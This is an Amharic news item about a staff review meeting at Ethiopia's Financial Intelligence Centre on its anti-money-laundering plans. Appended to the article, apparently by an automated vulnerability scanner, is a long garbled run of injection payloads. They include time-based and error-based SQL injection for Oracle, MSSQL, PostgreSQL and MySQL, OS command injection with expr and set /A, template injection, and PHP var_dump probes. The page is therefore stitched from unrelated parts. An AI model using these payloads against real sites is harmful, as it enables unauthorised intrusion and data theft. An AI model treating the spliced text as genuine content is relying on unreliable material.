የፋይናንስ ደህንነት መረጃ ማዕከል የሰራተኞች ውይይት መድረክ ተካሄደ
የፋይናንስ ደህንነት መረጃ ማዕከል ሰራተኞች በ2013 በጀት አመት እቅድ አፈጻጸም እና በ2014 በጀት አመት እቅድ ላይ ውይይት አካሄዱ፡፡
በወቅቱም የ2013 በጀት አመት እቅድ አፈጻጸም እና የ2014 በጀት አመት እቅድ በተቋሙ እቅድ ዝግጅት ባለሙያ አቶ በቃሉ ተፈራ ለሰራተኞቹ ቀርቦ ውይይት ተደርጎበታል፡፡ በበ2013 በጀት አመት በወንጀል ድርጊት የተገኘ ገንዘብን ህጋዊ አስመስሎ ማቅረብ፣ ሽብርተኝነትን በገንዘብ መረዳት እና የጅምላ ጨራሽ መሳሪያ ብዜትን በገንዘብ መደገፍ ወንጀሎችን ከመከላከል አንጻር የመረጃ ቅበላ፣ ትንተናና ስርጭት፤ የሱፕርቪዥን ስራዎች እና የስትራቴጂክ ጥናት ውጤታማነትን ከማሳደግ አንጻር እንዲሁም ሀገር አቀፍ ቅንጅታዊ አሰራርን፤ አለም አቀፍ አጋርነትና ትብብር እና በወንጀሎች ዙሪያ የህብረተሰቡን ግንዛቤ ከማሻሻል አንጻር የተሰሩ ተግባራት በዋና ክንውንነት ቀርበዋል፡፡
እንዲሁም በፋይናንስ እና ሽብረተኝነት ወንጀሎችን መከላከል ስራ ላይ የኢንተለጀንስ መረጃ ጥራት ማሻሻል፣ የማዕከሉ የቴክኖሎጂ አጠቃቀም እና የሰው ሀይል አቅም ማሻሻል፣ ከሀገር ውሰስጥ ባለድርሻ አካላት ጋር ቅንጅታዊ አሰራር ማጠናከር እና ሀገሪቱ በዓለም አቀፍ ደረጃ ያላትን ትብብርና አጋርነት ማጠናከር የ2014 በጀት አመት ዋና ዋና እቅዶች መሆናቸው በወቅቱ ተገልጿል፡፡
የፋይናንስ ደህንነት መረጃ ማዕከል ዋና ዳይሬክተር አቶ ቴዎድሮስ በቀለ በውይይቱ ወቅት እንደገለጹት በ2013 በጀት አመት ተቋሙ በዋናነት የተቋቋመበትን ዓላማ ማሳካት እንዲችል የተቋሙን መዋቅር ማስተካከል፣ የተለያዩ ህጎችን ማሻሻል እና ከባለድርሻ አካላት ጋር ቅንጅታዊ አሰራር መፍጠርና ማጠናከር በትኩረት የተሰራባቸው ጉዳዮች መሆናቸውን ጠቅሰው በዚህም የተቋሙን የሰው ሀይል ማሳደግ፣ ከባለድርሻ አካላት ጋር መልካም ግንኙነት መፍጠር፣ ተቋሙ በሚያከናውናቸው ተግባራት ዙሪያ በህብረተሰቡ እየታወቀ እንዲመጣ ማድረግ መቻሉን ገልጸዋል፡፡ ዋና ዳይሬክተሩ አክለውም በቀጣይ በጀት አመት ተቋሙ በወንጀል ድርጊት የተገኘ ገንዘብን/ሃብትን ህጋዊ አስመስሎ ማቅረብ ወንጀልን፣ ሽብርተኝነትን በገንዘብ መረዳት እና የጅምላ ጨራሽ መሳሪያን ብዜትን በገንዘብ የመደገፍ ወንጀሎች ዙሪያ ለሚመለከታቸው አካላት ጥራት ያለው የመረጃ ምንጭ ለመሆን በትኩረት ይሰራል ብለዋል፡፡ ለዚህም በወንጀሎቹ ዙሪያ የመረጃ ምንጮችን ማስፋት እና የሱፕርቪዥን ስራዎችን ለማስፋት የተለያዩ ተግባራት ይከናወናሉ፡፡ እንዲሁም ከሚዲያ ተቋማት ጋር ጠንካራ ግንኙነት በመፍጠር በወንጀሎቹ ዙሪያ ህብረተሰቡ ያለውን ግንዛቤ ለማሻሻል እና ወንጀሎቹን ከመቀነስ አንጻር አጋዥ እንዲሆን ማድረግ በትኩረት የሚሰራባቸው ጉዳዮች መሆናቸውን ገልጸዋል፡፡
የውይይቱ ተሳታፊ የነበሩ የተቋሙ ሰራተኞች የተለያዩ ሀሳቦችን እና አስተያየቶችን አንስተዋል፡፡ በአስተያየታቸውም ይህን መሰል የሰራተኞች መድረክ መዘጋጀቱ መልካም መሆኑን ጠቅሰው ተቋሙ የተጣለበትን ሀላፊነት በአግባቡ እንዲወጣ የተጀመረው ተቋማዊ አደረጃጀትን የማስተካከል ስራ ትኩረት መስጠት፣ ለስራ እንቅፋት የሚሆኑ የግብአት እና ሰው ሀይል እጥረት መቀረፍ አለበት ብለዋል፡፡ እንዲሁም ተቋሙ ከሚያከናውናቸው ተግባራት አንጻር በህብረተሰቡ እንዲታወቅ ወደ ህብረተሰቡ በበለጠ መቅረብ ይኖርበታል ብለዋል፡፡
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',7)='o
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('e',7)
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('v',0)
123456'and(select+1)>0waitfor/**/delay'0:0:7
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
(select*from(select+sleep(7)union/**/select+1)a)
(select*from(select+sleep(0)union/**/select+1)a)
123456"and"v"="i
123456"and"g"="g
123456'and'e'='m
123456'and'k'='k
123456/**/and+3=6
123456/**/and+1=1
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'"\(
123456
123456鎈'"\(
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1654173636')))>'0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1103770982')))
123456
123456/**/and/**/cast(md5('1375448542')as/**/int)>0
123456
expr 803065266 + 869542423
123456'and(select'1'from/**/cast(md5(1776447931)as/**/int))>'0
123456
123456&set /A 883603205+907621116
extractvalue(1,concat(char(126),md5(1963515664)))
123456
<%- 988766291+941426433 %>
123456$(expr 950123669 + 852426377)
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1717449615)))and"
#set($c=902435509+812382367)${c}$c
123456'and/**/extractvalue(1,concat(char(126),md5(1751738970)))and'
123456
123456|expr 968922295 + 938265234
${(853515653+972737308)?c}
123456
123456 expr 968335274 + 827284138
${974796745+919175550}
123456
123456
123456
123456
123456
123456
123456
123456
123456
/*1*/{{942934085+864574804}}
123456
${952044441+989902120}
123456
123456
123456
'-var_dump(md5(370606336))-'
123456
123456
${@var_dump(md5(688576824))};
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
bgftqvmzuwzisgaibbiu
123456
123456
123456
123456
123456
123456